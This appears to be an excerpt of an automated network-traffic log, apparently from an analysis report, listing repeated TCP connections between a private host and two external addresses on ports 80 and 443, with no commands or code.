Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
